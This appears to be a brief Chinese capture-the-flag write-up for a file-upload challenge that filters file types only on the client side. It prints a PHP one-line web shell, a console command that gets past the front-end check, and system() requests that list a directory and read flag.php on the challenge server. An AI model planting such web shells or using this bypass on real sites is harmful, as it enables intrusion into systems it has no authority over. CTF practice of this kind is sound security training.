进入界面
只有一个上传功能。
查看源码
发现前端对文件类型进行了过滤,不是jpg,png文件就把上传按钮禁用。
编写上传文件
php一句话 <?php eval($_GET['cmd']);?>
绕过验证
这里可以在前端把上传按钮删了,然后在控制台用document.getElementById(“aa”).submit() 提交进行绕过。
上传成功
获取flag
访问上传的文件获取文件目录
http://220.249.52.133:42832/upload/1596538023.213.php?cmd=system(“ls ..
/”);
答案已经很简单了,打印flag.php
http://220.249.52.133:42832/upload/1596538023.213.php?cmd=system(“cat ..
/flag.php”);
拿到flag